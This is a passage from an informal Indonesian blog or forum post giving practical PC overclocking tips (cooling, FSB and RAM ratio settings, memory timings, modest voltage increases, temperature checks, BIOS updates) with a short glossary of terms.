Semakin dingin sebuah system (batas kewajaran) maka akan semakin sstabil system tersebut. Pengamplasan pada permukaan head processor dan permukaan headsing secara halus/rata (sehingga kedua permukaan dapat menempel secara menyeluruh) dapat menambah efek pendinginan pada processor. Begitu juga penggunaan headsing yang besar, kipas dengan kecepatan tinggi (diperhatikan arah semburan angin agar benar2 mengenai headsing), pemakaian thermal paste untuk memastikan permukaan processor dengan headsing saling menempel, kipas pada casing, adalah hal2 yang dapat membantu pada proses pendinginan system kita.

2. PENYESUAIAN TEGANGAN LISTRIK
Pada saat overclocking, system membutuhkan tegangan yang lebih tinggi agar dapat beroperasi dengan baik/normal. Beberapa motherboard memang menyediakan fasilitas penambahan tegangan listrik untuk processor, beberapa bahkan dapat menambah tegangan listrik untuk chipset motherboard. Namun perlu diingat bahwa penambahan tegangan listrik akan mengakibatkan penambahan suhu pada system. Untuk itu perlu disesuaikan kebutuhan tegangan listrik untuk system.

3. PERIPHERAL PENDUKUNG OVERCLOCKING
Saat overclocking ada kalanya kecepatan FSB yang digunakan melampaui batas normal. Ada beberapa peripheral yang dapat bekerja saat FSB tinggi, namun ada juga yang tidak. Bila hardisk tidak mampu digunakan pada FSB tinggi maka kemungkinan seluruh isi hardisk atau system akan terhapus. Demikian pula dengan memory card (RAM), bila tidak kuat akan mengakibatkan hang saat booting. Hal yang paling mengerikan adalah pada VGA card. Jika peripheral ini tidak mampu untuk beroperasi pada FSB tinggi, maka kemungkinan kita relakan saja kepergiannya. Jadi intinya kenalilah dulu system dan hardware kita. Kalau bisa gunakan peripheral yang bermutu tinggi dan berhati2 dalam overclocking.

Tips Overclock Secara Praktis

kalo pertama kali kita denger kata overclock pasti yang kita banyangin adalah serem n kita takut komputer kita meledak lah,,,,,, eits tunggu dulu nech, dibawah ini saya nguntil dari web empunya OC supaya kita aman-aman saja dlam nge-OC komputer kita,,, masih mau dilanjut, yawdah dech kita langsung aza ke tips OC yang praktis y:

1. Kenali sistem kita!

Cari tau sebanyak2nya tentang sistem yg mau kita o/c.Contohnya core prosesor,clockspeed,merk mobo,chipset mobo,bios,merk ram,chip ram,spec ram,power supply,pendingin dr mobo sama prosesor,dsb. Pake aj software kayak cpu-z(wajib buat o/c Very Happy),sisoft sandra,everest,dsb. Bongkar pula komputer buat ngeliat dalemannya. Ini penting, soalnya tiap komponen punya karakteristik sendiri2.

2. Ubah setting BIOS

Masuk ke dalam bios (jgn bilang nggak tau lo ya).Cari aj di advanced menu ato semacamnya. Khusus untuk mobo Gigabyte biasanya perlu Ctrl+F1 dulu baru keluar.
- Ubah FSB
Naikin aj FSB dikit2 (misal per 10 MHz),trs coba restart n masuk Windows.
Coba dengan software benchmark semacam Super-PI ato 3Dmark ato semacamnya,pokoknya program2 berat. Klo lancar masuk ke bios lagi n naikin lagi FSBnya.
- Biar RAM nggak jadi beban,pake rasio FSB:RAM=1:1. Jadi jika FSB=200MHz maka RAM jadi 200MHz juga. Komp skr kan biasanya pake DDR2 667,shg frequensi dr RAM defaultnya 333MHz. Dengan begitu kita bisa naikin FSB sampe 333MHz tanpa membebani RAM. Biasanya di Bios buat milih rasio caranya disuruh milih jenis RAMnya,pilih aj DDR400 buat rasio 1:1. Ada juga yg bisa langsung milih rasionya.
- Atur timing memori (CAS latency,RAS to CAS,RAS Precharge,tRAS,tRC,dsb) selonggar2nya. Caranya dengan mengambil nilai yg besar. Misalnya 5-5-5-15-20 kita besarin jadi 6-6-6-19-26.
- Jika dah nggak stabil lagi,baru naikin tegangan Vcore (V prosesor),V DIMM (V RAM), VDD,dsb. Jangan gede2. Soalnya ini berpengaruh langsung ke panas dari komponen. Biasanya kenaikan 10% masih aman buat komponen. Untuk VDIMM,ini tergantung dari modul RAM. Jika PCB tebel,ini bisa disetrom sampe 2,4V,tp klo tipis,lebih baik jgn ngelebihi 2,2V.
- Uji coba dengan setting lain,misalkan dengan FSB:rasio yg berbeda. Dalam beberapa kasus,modul RAM nggak bisa berjalan pd frequensi yg rendah(spt punyaku),jd harus pake rasio 4:5 malah bisa berjalan.
- Untuk prosesor AMD,perhatikan juga frequensi dari Hyper Transport. Defaultnya biasanya 1000MHz. Biar aman taruh aj Hyper Transport ke frequensi 600MHz dulu. Caranya dengan mengganti multiplier dari hyper transport ke yang lebih rendah.

3. Perhatikan suhu dari sistem

Sering2 lihat suhu sistem. Musuh utama o/c adalah suhu. Jadi setiap habis nyobain,liat dulu suhu dr sistem. Usahakan jgn sampe melebihi 60 C. Hati2,kadang2 suhu di bios bisa menipu. Lebih baik rasakan langsung dengan tangan. Jika dah panas lebih baik jangan lanjutin o/c ato ganti pendingin dgn yg lebih baik. Pake thermal grease yg berkualitas juga. Air flow casing dijaga.

4. Jika perlu lakukan Update BIOS

Update BIOS kadang2 bisa membantu mengatasi masalah o/c.Misalnya dengan menambah menu yg bisa diatur,dsb. Bisa juga memperbaiki sensor dari suhu. Cuma hati2 dengan proses updatenya. Klo gagal bisa mati mobonya. Bisa menggunakan BIOS dr produsen ato BIOS mod. Tempat yg baik utk mencari BIOS mod adalah rebelheaven.

Error yg biasanya muncul:
- Windows tidak mau booting (restart di tengah jalan) —>biasanya V prosesor kurang. Naikin aj dikit.
- Windows memory dump —> biasanya gara2 memori dah nggak kuat ngangkat. Longgarin timing ato tambah V DIMM. Pengubahan rasio kadang bisa membantu.
-Komp nggak mau hidup —> Clear CMOS dulu baru turunin FSB prosesor.

Panduan untuk o/c ringan
Cukup lakukan langkah ubah FSB sama timing aj. Biasanya dah bisa naik cukup banyak. Tergantung komponen. Yang paling tinggi dengan ubah FSB dan timing saja,/me berhasil naikin Prosesorku (Athlon 64 X2 4000+ core Brisbane @ 2,1GHz) ke 2,7 GHz. Lumayan kan. Apalagi untuk sistem AMD yg transfer memorinya tergantung dr clock speed.

Yah,biasanya itu aj sih yg biasanya kucoba. Klo o/c extreme perlu langkah2 selain diatas. Pertanyaan lebih lanjut bisa dilanjutin di Students>Computer n Networks>Computer Overclocking. Ntar klo sempet kulanjutin ke o/c VGA.

Kosakata:
Core —> Inti dari prosesor. Tiap prosesor mempunyai spesifikasi sendiri2. Jadi jika ada Athlon 64 3200+ belum tentu sama dgn yg lain. Ada yg berbeda tegangan, fabrikasi, jumlah Watt, dsb. Punya nama2 sendiri2 seperti Brisbande,Windsor,conroe,Prescot,dsb.
FSB —> Front Side Bus. Bus/jalan yang menghubungkan antara chipset dengan prosesor (+memori untuk sistem Intel).
Chipset —> polisi data dari motherboard. Jika prosesor sbg pengolah data, maka chipset merupakan polisi yg mengatur data2 yg mau lewat ke prosesor atau ke perangkat yg lain.
Hyper Transport —> teknologi dr AMD yg mampu membawa data dengan kecepatan tinggi dr prosesor ke chipset.
Clear CMOS —> proses untuk mengembalikan ke setting default BIOS. Biasanya dengan mengganti posisi jumper di mobo dr 1-2 ke 2-3.
o/c —> overclock,menaikkan frequensi dr komponen di atas standar
timing memori —> kecepatan RAM untuk mengakses data,biasanya semakin kecil semakin cepat.